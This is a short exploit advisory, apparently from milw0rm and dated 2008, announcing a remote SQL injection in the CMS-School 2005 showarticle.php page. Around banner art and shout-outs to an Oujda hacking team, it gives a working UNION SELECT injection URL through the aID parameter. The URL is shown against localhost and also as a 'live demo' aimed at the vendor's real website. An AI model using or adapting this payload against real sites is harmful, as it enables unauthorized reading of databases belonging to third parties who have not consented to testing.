********************************************************************************************* [!] [!] [!] OOOO O OOOOOOOOO [!] [!]O O O O O [!] [!]O O O [!] [!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] [!]O OOO OOO O O O O OO O O O O OO O O O [!] [!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] [!]O O OOOO O O O O O O O O O O O [!] [!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] [!] OO [!] [!] OO [!] [!] OO Proud To Be MoroCCaN [!] [!] OO [!] ********************************************************************************************* Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR --------------------------------------------------------------------------------------------- = CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability = --------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------- -===========================================================================================- -= SQL InjEction By : Cyber-Zone =- -= =- -= E-mail : paradis_des_fous@hotmail.fr =- -= =- -= Home : WwW.IQ-Ty.CoM =- -===========================================================================================- --------------------------------------------------------------------------------------------- Download : http://www.niclor.net/prodotti/cms_school/ Exploit : http://localhost/cms_school/showarticle.php?aID=-4+union+select+version(),2,3-- live demo : http://www.niclor.net/prodotti/cms_school/showarticle.php?aID=-4+union+select+version(),2,3-- --------------------------------------------------------------------------------------------- -======================================= ThanX To ==========================================- -= Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord =- -= =- -= WwW.IQ-ty.Com , No-Exploit (JIKO) =- -= =- -= Oujda SeCurity TeaM =- -===========================================================================================- --------------------------------------------------------------------------------------------- Spicial ThanX To My Friend StaCk & All KazaWa Boys :) # milw0rm.com [2008-11-04]